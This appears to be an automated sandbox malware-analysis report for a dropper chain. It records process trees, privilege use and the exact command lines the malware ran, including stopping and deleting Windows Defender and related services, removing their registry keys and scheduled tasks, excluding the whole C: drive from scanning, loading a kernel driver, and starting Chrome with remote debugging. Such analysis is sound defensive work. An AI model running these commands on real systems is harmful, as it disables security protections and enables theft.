description pid Process Token: SeDebugPrivilege 5788 driverSessionRuntimehost.exe Token: SeDebugPrivilege 1488 powershell.exe Token: SeDebugPrivilege 5680 powershell.exe Token: SeDebugPrivilege 3548 powershell.exe Token: SeDebugPrivilege 4736 powershell.exe Token: SeDebugPrivilege 632 powershell.exe Token: SeDebugPrivilege 2472 powershell.exe Token: SeDebugPrivilege 2072 powershell.exe Token: SeDebugPrivilege 560 powershell.exe Token: SeDebugPrivilege 5552 powershell.exe Token: SeDebugPrivilege 2152 powershell.exe Token: SeDebugPrivilege 5276 powershell.exe Token: SeDebugPrivilege 1440 powershell.exe Token: SeDebugPrivilege 5284 powershell.exe Token: SeDebugPrivilege 1812 taskhostw.exe Token: SeDebugPrivilege 1360 taskhostw.exe Token: SeDebugPrivilege 2552 explorer.exe Token: SeDebugPrivilege 6212 powershell.exe Token: SeDebugPrivilege 6188 powershell.exe Token: SeDebugPrivilege 6300 powershell.exe Token: SeDebugPrivilege 6328 spoolsv.exe Token: SeDebugPrivilege 6288 explorer.exe Token: SeDebugPrivilege 6396 spoolsv.exe Token: SeDebugPrivilege 6420 powershell.exe Token: SeDebugPrivilege 6968 powershell.exe Token: SeDebugPrivilege 6196 powershell.exe Token: SeDebugPrivilege 6628 powershell.exe Token: SeDebugPrivilege 228 powershell.exe Token: SeShutdownPrivilege 4512 chrome.exe Token: SeCreatePagefilePrivilege 4512 chrome.exe Token: SeShutdownPrivilege 4512 chrome.exe Token: SeCreatePagefilePrivilege 4512 chrome.exe Token: SeDebugPrivilege 5812 please18.exe Token: SeShutdownPrivilege 4512 chrome.exe Token: SeCreatePagefilePrivilege 4512 chrome.exe -
Suspicious use of FindShellTrayWindow 30 IoCs
pid Process 1488 1T38q6.exe 4512 chrome.exe 4512 chrome.exe 4512 chrome.exe 4512 chrome.exe 4512 chrome.exe 4512 chrome.exe 4512 chrome.exe 4512 chrome.exe 4512 chrome.exe 4512 chrome.exe 4512 chrome.exe 4512 chrome.exe 4512 chrome.exe 4512 chrome.exe 4512 chrome.exe 4512 chrome.exe 4512 chrome.exe 4512 chrome.exe 4512 chrome.exe 4512 chrome.exe 4512 chrome.exe 4512 chrome.exe 4512 chrome.exe 4512 chrome.exe 4512 chrome.exe 4512 chrome.exe 3812 2902ecdfd4.exe 3812 2902ecdfd4.exe 3812 2902ecdfd4.exe -
Suspicious use of SendNotifyMessage 3 IoCs
pid Process 3812 2902ecdfd4.exe 3812 2902ecdfd4.exe 3812 2902ecdfd4.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 3968 wrote to memory of 2284 3968 74391f66b859af4d9ff3f7ad28524a17d738af3bac1c3c438e358c152b604e8d.exe 89 PID 3968 wrote to memory of 2284 3968 74391f66b859af4d9ff3f7ad28524a17d738af3bac1c3c438e358c152b604e8d.exe 89 PID 3968 wrote to memory of 2284 3968 74391f66b859af4d9ff3f7ad28524a17d738af3bac1c3c438e358c152b604e8d.exe 89 PID 2284 wrote to memory of 1488 2284 d0H09.exe 92 PID 2284 wrote to memory of 1488 2284 d0H09.exe 92 PID 2284 wrote to memory of 1488 2284 d0H09.exe 92 PID 4600 wrote to memory of 1848 4600 cmd.exe 93 PID 4600 wrote to memory of 1848 4600 cmd.exe 93 PID 552 wrote to memory of 5732 552 cmd.exe 94 PID 552 wrote to memory of 5732 552 cmd.exe 94 PID 1488 wrote to memory of 2884 1488 1T38q6.exe 97 PID 1488 wrote to memory of 2884 1488 1T38q6.exe 97 PID 1488 wrote to memory of 2884 1488 1T38q6.exe 97 PID 2284 wrote to memory of 4704 2284 d0H09.exe 98 PID 2284 wrote to memory of 4704 2284 d0H09.exe 98 PID 2284 wrote to memory of 4704 2284 d0H09.exe 98 PID 2884 wrote to memory of 2328 2884 rapes.exe 105 PID 2884 wrote to memory of 2328 2884 rapes.exe 105 PID 2328 wrote to memory of 808 2328 EPTwCQd.exe 106 PID 2328 wrote to memory of 808 2328 EPTwCQd.exe 106 PID 2328 wrote to memory of 808 2328 EPTwCQd.exe 106 PID 2328 wrote to memory of 808 2328 EPTwCQd.exe 106 PID 2328 wrote to memory of 808 2328 EPTwCQd.exe 106 PID 2328 wrote to memory of 808 2328 EPTwCQd.exe 106 PID 2328 wrote to memory of 808 2328 EPTwCQd.exe 106 PID 2328 wrote to memory of 808 2328 EPTwCQd.exe 106 PID 2328 wrote to memory of 808 2328 EPTwCQd.exe 106 PID 2884 wrote to memory of 1464 2884 rapes.exe 109 PID 2884 wrote to memory of 1464 2884 rapes.exe 109 PID 2884 wrote to memory of 1464 2884 rapes.exe 109 PID 1464 wrote to memory of 1580 1464 apple.exe 110 PID 1464 wrote to memory of 1580 1464 apple.exe 110 PID 1464 wrote to memory of 1580 1464 apple.exe 110 PID 1580 wrote to memory of 5624 1580 22.exe 112 PID 1580 wrote to memory of 5624 1580 22.exe 112 PID 5624 wrote to memory of 2912 5624 cmd.exe 114 PID 5624 wrote to memory of 2912 5624 cmd.exe 114 PID 5624 wrote to memory of 2912 5624 cmd.exe 114 PID 2912 wrote to memory of 5012 2912 22.exe 115 PID 2912 wrote to memory of 5012 2912 22.exe 115 PID 5012 wrote to memory of 5388 5012 cmd.exe 117 PID 5012 wrote to memory of 5388 5012 cmd.exe 117 PID 5012 wrote to memory of 4296 5012 cmd.exe 118 PID 5012 wrote to memory of 4296 5012 cmd.exe 118 PID 5012 wrote to memory of 5572 5012 cmd.exe 119 PID 5012 wrote to memory of 5572 5012 cmd.exe 119 PID 5012 wrote to memory of 1704 5012 cmd.exe 120 PID 5012 wrote to memory of 1704 5012 cmd.exe 120 PID 5012 wrote to memory of 4264 5012 cmd.exe 121 PID 5012 wrote to memory of 4264 5012 cmd.exe 121 PID 5012 wrote to memory of 3496 5012 cmd.exe 122 PID 5012 wrote to memory of 3496 5012 cmd.exe 122 PID 5012 wrote to memory of 3896 5012 cmd.exe 123 PID 5012 wrote to memory of 3896 5012 cmd.exe 123 PID 5012 wrote to memory of 5080 5012 cmd.exe 124 PID 5012 wrote to memory of 5080 5012 cmd.exe 124 PID 5012 wrote to memory of 6120 5012 cmd.exe 125 PID 5012 wrote to memory of 6120 5012 cmd.exe 125 PID 5012 wrote to memory of 5180 5012 cmd.exe 126 PID 5012 wrote to memory of 5180 5012 cmd.exe 126 PID 5012 wrote to memory of 5192 5012 cmd.exe 127 PID 5012 wrote to memory of 5192 5012 cmd.exe 127 PID 5012 wrote to memory of 5476 5012 cmd.exe 128 PID 5012 wrote to memory of 5476 5012 cmd.exe 128 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Users\Admin\AppData\Local\Temp\74391f66b859af4d9ff3f7ad28524a17d738af3bac1c3c438e358c152b604e8d.exe"C:\Users\Admin\AppData\Local\Temp\74391f66b859af4d9ff3f7ad28524a17d738af3bac1c3c438e358c152b604e8d.exe"1⤵
- Adds Run key to start application
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:3968 -
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\d0H09.exeC:\Users\Admin\AppData\Local\Temp\IXP000.TMP\d0H09.exe2⤵
- Executes dropped EXE
- Adds Run key to start application
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2284 -
C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\1T38q6.exeC:\Users\Admin\AppData\Local\Temp\IXP001.TMP\1T38q6.exe3⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Checks computer location settings
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
- Suspicious use of WriteProcessMemory
PID:1488 -
C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe"C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe"4⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Downloads MZ/PE file
- Checks BIOS information in registry
- Checks computer location settings
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:2884 -
C:\Users\Admin\AppData\Local\Temp\10345240101\EPTwCQd.exe"C:\Users\Admin\AppData\Local\Temp\10345240101\EPTwCQd.exe"5⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:2328 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"6⤵
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:808
-
-
-
C:\Users\Admin\AppData\Local\Temp\10357800101\apple.exe"C:\Users\Admin\AppData\Local\Temp\10357800101\apple.exe"5⤵
- Checks computer location settings
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:1464 -
C:\Users\Admin\AppData\Local\Temp\22.exe"C:\Users\Admin\AppData\Local\Temp\22.exe"6⤵
- Checks computer location settings
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:1580 -
C:\Windows\system32\cmd.exe"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\A122.tmp\A123.tmp\A124.bat C:\Users\Admin\AppData\Local\Temp\22.exe"7⤵
- Suspicious use of WriteProcessMemory
PID:5624 -
C:\Users\Admin\AppData\Local\Temp\22.exe"C:\Users\Admin\AppData\Local\Temp\22.exe" go8⤵
- Checks computer location settings
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2912 -
C:\Windows\system32\cmd.exe"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\A1DD.tmp\A1DE.tmp\A1DF.bat C:\Users\Admin\AppData\Local\Temp\22.exe go"9⤵
- Suspicious use of WriteProcessMemory
PID:5012 -
C:\Windows\system32\sc.exesc create ddrver type= kernel binPath= "C:\Users\Admin\AppData\Local\Temp\ssisd.sys"10⤵
- Launches sc.exe
PID:5388
-
-
C:\Windows\system32\sc.exesc start ddrver10⤵
- Launches sc.exe
PID:4296
-
-
C:\Windows\system32\timeout.exetimeout /t 110⤵
- Delays execution with timeout.exe
PID:5572
-
-
C:\Windows\system32\sc.exesc stop ddrver10⤵
- Launches sc.exe
PID:1704
-
-
C:\Windows\system32\sc.exesc start ddrver10⤵
- Launches sc.exe
PID:4264
-
-
C:\Windows\system32\takeown.exetakeown /f "C:\ProgramData\Microsoft\Windows Defender" /r /d y10⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:3496
-
-
C:\Windows\system32\icacls.exeicacls "C:\ProgramData\Microsoft\Windows Defender" /grant administrators:F /t10⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:3896
-
-
C:\Windows\system32\sc.exesc stop "WinDefend"10⤵
- Launches sc.exe
PID:5080
-
-
C:\Windows\system32\sc.exesc delete "WinDefend"10⤵
- Launches sc.exe
PID:6120
-
-
C:\Windows\system32\reg.exereg delete "HKLM\System\CurrentControlset\Services\WinDefend" /f10⤵PID:5180
-
-
C:\Windows\system32\sc.exesc stop "MDCoreSvc"10⤵
- Launches sc.exe
PID:5192
-
-
C:\Windows\system32\sc.exesc delete "MDCoreSvc"10⤵
- Launches sc.exe
PID:5476
-
-
C:\Windows\system32\reg.exereg delete "HKLM\System\CurrentControlset\Services\MDCoreSvc" /f10⤵PID:5472
-
-
C:\Windows\system32\sc.exesc stop "WdNisSvc"10⤵
- Launches sc.exe
PID:4488
-
-
C:\Windows\system32\sc.exesc delete "WdNisSvc"10⤵
- Launches sc.exe
PID:2816
-
-
C:\Windows\system32\reg.exereg delete "HKLM\System\CurrentControlset\Services\WdNisSvc" /f10⤵PID:1152
-
-
C:\Windows\system32\sc.exesc stop "Sense"10⤵
- Launches sc.exe
PID:2052
-
-
C:\Windows\system32\sc.exesc delete "Sense"10⤵
- Launches sc.exe
PID:4092
-
-
C:\Windows\system32\reg.exereg delete "HKLM\System\CurrentControlset\Services\Sense" /f10⤵PID:860
-
-
C:\Windows\system32\sc.exesc stop "wscsvc"10⤵
- Launches sc.exe
PID:5516
-
-
C:\Windows\system32\sc.exesc delete "wscsvc"10⤵
- Launches sc.exe
PID:5336
-
-
C:\Windows\system32\reg.exereg delete "HKLM\System\CurrentControlset\Services\wscsvc" /f10⤵
- Modifies security service
PID:1240
-
-
C:\Windows\system32\sc.exesc stop "SgrmBroker"10⤵
- Launches sc.exe
PID:5540
-
-
C:\Windows\system32\sc.exesc delete "SgrmBroker"10⤵
- Launches sc.exe
PID:5208
-
-
C:\Windows\system32\reg.exereg delete "HKLM\System\CurrentControlset\Services\SgrmBroker" /f10⤵PID:3964
-
-
C:\Windows\system32\sc.exesc stop "SecurityHealthService"10⤵
- Launches sc.exe
PID:5732
-
-
C:\Windows\system32\sc.exesc delete "SecurityHealthService"10⤵
- Launches sc.exe
PID:5156
-
-
C:\Windows\system32\reg.exereg delete "HKLM\System\CurrentControlset\Services\SecurityHealthService" /f10⤵PID:5728
-
-
C:\Windows\system32\sc.exesc stop "webthreatdefsvc"10⤵
- Launches sc.exe
PID:552
-
-
C:\Windows\system32\sc.exesc delete "webthreatdefsvc"10⤵
- Launches sc.exe
PID:3504
-
-
C:\Windows\system32\reg.exereg delete "HKLM\System\CurrentControlset\Services\webthreatdefsvc" /f10⤵PID:4592
-
-
C:\Windows\system32\sc.exesc stop "webthreatdefusersvc"10⤵
- Launches sc.exe
PID:5828
-
-
C:\Windows\system32\sc.exesc delete "webthreatdefusersvc"10⤵
- Launches sc.exe
PID:5888
-
-
C:\Windows\system32\reg.exereg delete "HKLM\System\CurrentControlset\Services\webthreatdefusersvc" /f10⤵PID:5860
-
-
C:\Windows\system32\sc.exesc stop "WdNisDrv"10⤵
- Launches sc.exe
PID:1256
-
-
C:\Windows\system32\sc.exesc delete "WdNisDrv"10⤵
- Launches sc.exe
PID:5700
-
-
C:\Windows\system32\reg.exereg delete "HKLM\System\CurrentControlset\Services\WdNisDrv" /f10⤵PID:3856
-
-
C:\Windows\system32\sc.exesc stop "WdBoot"10⤵
- Launches sc.exe
PID:5300
-
-
C:\Windows\system32\sc.exesc delete "WdBoot"10⤵
- Launches sc.exe
PID:4612
-
-
C:\Windows\system32\reg.exereg delete "HKLM\System\CurrentControlset\Services\WdBoot" /f10⤵PID:1672
-
-
C:\Windows\system32\sc.exesc stop "WdFilter"10⤵
- Launches sc.exe
PID:3712
-
-
C:\Windows\system32\sc.exesc delete "WdFilter"10⤵
- Launches sc.exe
PID:1012
-
-
C:\Windows\system32\reg.exereg delete "HKLM\System\CurrentControlset\Services\WdFilter" /f10⤵PID:5812
-
-
C:\Windows\system32\sc.exesc stop "SgrmAgent"10⤵
- Launches sc.exe
PID:816
-
-
C:\Windows\system32\sc.exesc delete "SgrmAgent"10⤵
- Launches sc.exe
PID:220
-
-
C:\Windows\system32\reg.exereg delete "HKLM\System\CurrentControlset\Services\SgrmAgent" /f10⤵PID:4584
-
-
C:\Windows\system32\sc.exesc stop "MsSecWfp"10⤵
- Launches sc.exe
PID:4700
-
-
C:\Windows\system32\sc.exesc delete "MsSecWfp"10⤵
- Launches sc.exe
PID:1056
-
-
C:\Windows\system32\reg.exereg delete "HKLM\System\CurrentControlset\Services\MsSecWfp" /f10⤵PID:3548
-
-
C:\Windows\system32\sc.exesc stop "MsSecFlt"10⤵
- Launches sc.exe
PID:5224
-
-
C:\Windows\system32\sc.exesc delete "MsSecFlt"10⤵
- Launches sc.exe
PID:4248
-
-
C:\Windows\system32\reg.exereg delete "HKLM\System\CurrentControlset\Services\MsSecFlt" /f10⤵PID:5680
-
-
C:\Windows\system32\sc.exesc stop "MsSecCore"10⤵
- Launches sc.exe
PID:5216
-
-
C:\Windows\system32\sc.exesc delete "MsSecCore"10⤵
- Launches sc.exe
PID:1440
-
-
C:\Windows\system32\reg.exereg delete "HKLM\System\CurrentControlset\Services\MsSecCore" /f10⤵PID:5276
-
-
C:\Windows\system32\schtasks.exeschtasks /Delete /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /f10⤵PID:2288
-
-
C:\Windows\system32\schtasks.exeschtasks /Delete /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /f10⤵PID:2664
-
-
C:\Windows\system32\schtasks.exeschtasks /Delete /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /f10⤵PID:5232
-
-
C:\Windows\system32\schtasks.exeschtasks /Delete /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /f10⤵PID:5672
-
-
C:\Windows\system32\sc.exesc stop ddrver10⤵
- Launches sc.exe
PID:5660
-
-
C:\Windows\system32\sc.exesc delete ddrver10⤵
- Launches sc.exe
PID:4136
-
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\10358260101\Rm3cVPI.exe"C:\Users\Admin\AppData\Local\Temp\10358260101\Rm3cVPI.exe"5⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:2380
-
-
C:\Users\Admin\AppData\Local\Temp\10358510101\39pazbF.exe"C:\Users\Admin\AppData\Local\Temp\10358510101\39pazbF.exe"5⤵
- Checks computer location settings
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Modifies registry class
PID:5384 -
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\blockFont\RCFq55Xye2OND6fgqD4IMDPhWlMW24NisMm.vbe"6⤵
- Checks computer location settings
- System Location Discovery: System Language Discovery
PID:4904 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\blockFont\5kWmxvcKnQb4wxG7wLsjn39017FDvgFhNZjsT5fBaxHRW.bat" "7⤵
- System Location Discovery: System Language Discovery
PID:4560 -
C:\Users\Admin\AppData\Roaming\blockFont\driverSessionRuntimehost.exe"C:\Users\Admin\AppData\Roaming\blockFont/driverSessionRuntimehost.exe"8⤵
- Modifies WinLogon for persistence
- Checks computer location settings
- Executes dropped EXE
- Adds Run key to start application
- Drops file in Program Files directory
- Drops file in Windows directory
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:5788 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:/'9⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious use of AdjustPrivilegeToken
PID:5284
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:/$Recycle.Bin/'9⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious use of AdjustPrivilegeToken
PID:3548
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:/9067c5701a2f6bcc5b/'9⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious use of AdjustPrivilegeToken
PID:4736
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:/95a9da8d6083c53f11d88fcfaf8c/'9⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious use of AdjustPrivilegeToken
PID:1488
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:/Documents and Settings/'9⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious use of AdjustPrivilegeToken
PID:2152
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:/PerfLogs/'9⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious use of AdjustPrivilegeToken
PID:5680
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:/Program Files/'9⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious use of AdjustPrivilegeToken
PID:5552
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:/Program Files (x86)/'9⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious use of AdjustPrivilegeToken
PID:632
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:/ProgramData/'9⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious use of AdjustPrivilegeToken
PID:1440
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:/Recovery/'9⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious use of AdjustPrivilegeToken
PID:2072
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:/System Volume Information/'9⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious use of AdjustPrivilegeToken
PID:5276
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:/Users/'9⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious use of AdjustPrivilegeToken
PID:560
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:/Windows/'9⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious use of AdjustPrivilegeToken
PID:2472
-
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\uubsvpbb\uubsvpbb.cmdline"9⤵
- Drops file in Program Files directory
PID:6120 -
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES3582.tmp" "c:\Program Files (x86)\Microsoft\Edge\Application\CSCDED23E4A8FF44C998FDEACA1656E198.TMP"10⤵PID:3372
-
-
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\5ekenk5l\5ekenk5l.cmdline"9⤵
- Drops file in System32 directory
PID:776 -
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES39A9.tmp" "c:\Windows\System32\CSC47A16FA37D68471AAC4E35BE80B169E.TMP"10⤵PID:5476
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\ox2qwALiHg.bat"9⤵PID:6160
-
C:\Windows\system32\chcp.comchcp 6500110⤵PID:6456
-
-
C:\Windows\system32\w32tm.exew32tm /stripchart /computer:localhost /period:5 /dataonly /samples:210⤵PID:6472
-
-
C:\Windows\SKB\LanguageModels\powershell.exe"C:\Windows\SKB\LanguageModels\powershell.exe"10⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:6968
-
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\10359310101\Or1ARiR.exe"C:\Users\Admin\AppData\Local\Temp\10359310101\Or1ARiR.exe"5⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
PID:6660
-
-
C:\Users\Admin\AppData\Local\Temp\10359660101\xZRvIQ5.exe"C:\Users\Admin\AppData\Local\Temp\10359660101\xZRvIQ5.exe"5⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:6888 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"6⤵
- System Location Discovery: System Language Discovery
PID:6900
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command Expand-Archive -Path 'C:\Users\Admin\AppData\Local\Temp\10359820261\martin.zip' -DestinationPath 'C:\Users\Admin\AppData\Local\Temp\10359820261\martin\'5⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious use of AdjustPrivilegeToken
PID:6196
-
-
C:\Users\Admin\AppData\Local\Temp\10359820261\martin\installer.exe"C:\Users\Admin\AppData\Local\Temp\10359820261\martin\installer.exe"5⤵
- Executes dropped EXE
- Loads dropped DLL
PID:3340
-
-
C:\Users\Admin\AppData\Local\Temp\10360100101\amnew.exe"C:\Users\Admin\AppData\Local\Temp\10360100101\amnew.exe"5⤵
- Checks computer location settings
- Executes dropped EXE
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
PID:6516 -
C:\Users\Admin\AppData\Local\Temp\97419fb2c0\futors.exe"C:\Users\Admin\AppData\Local\Temp\97419fb2c0\futors.exe"6⤵
- Downloads MZ/PE file
- Checks computer location settings
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:5316 -
C:\Users\Admin\AppData\Local\Temp\10001960101\gron12321.exe"C:\Users\Admin\AppData\Local\Temp\10001960101\gron12321.exe"7⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:3252 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"8⤵PID:4692
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"8⤵PID:6544
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"8⤵
- System Location Discovery: System Language Discovery
PID:1924
-
-
-
C:\Users\Admin\AppData\Local\Temp\10026630101\v7942.exe"C:\Users\Admin\AppData\Local\Temp\10026630101\v7942.exe"7⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:2012 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"8⤵
- System Location Discovery: System Language Discovery
- Checks processor information in registry
PID:3916 -
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default"9⤵
- Uses browser remote debugging
- Enumerates system info in registry
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
PID:4512 -
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=133.0.6943.60 --initial-client-data=0x160,0x164,0x168,0x120,0x16c,0x7ffbb678dcf8,0x7ffbb678dd04,0x7ffbb678dd1010⤵PID:6292
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --string-annotations --gpu-preferences=UAAAAAAAAADgAAAEAAAAAAAAAAAAAAAAAABgAAEAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --field-trial-handle=1976,i,14955777914410037458,259757930393019573,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=1972 /prefetch:210⤵PID:6184
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --string-annotations --field-trial-handle=1568,i,14955777914410037458,259757930393019573,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=2276 /prefetch:310⤵PID:1424
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --string-annotations --field-trial-handle=2396,i,14955777914410037458,259757930393019573,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=2540 /prefetch:810⤵PID:4256
-
-
